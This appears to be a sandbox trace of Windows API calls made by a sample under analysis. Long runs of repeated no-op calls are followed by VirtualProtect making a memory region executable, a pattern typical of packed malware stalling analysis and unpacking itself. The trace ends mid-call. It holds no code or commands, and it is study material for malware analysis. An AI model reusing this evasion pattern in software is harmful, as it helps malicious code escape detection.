[0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.623] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.624] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.625] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.626] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.627] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.628] SetGraphicsMode (hdc=0x0, iMode=0) returned 0 [0036.638] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0036.642] VirtualProtect (in: lpAddress=0x251908, dwSize=0x29c3f, flNewProtect=0x40, lpflOldProtect=0x12feb4 | out: lpflOldProtect=0x12feb4*=0x4) returned 1 [0036.642] IsProcessInJob (in: ProcessHandle=0x0, JobHandle=0x0, Result=0x12fe88 | out: Result=0x12fe88) returned 0 [0036.642] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.642] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.643] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.643] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.644] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.644] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.645] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.645] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 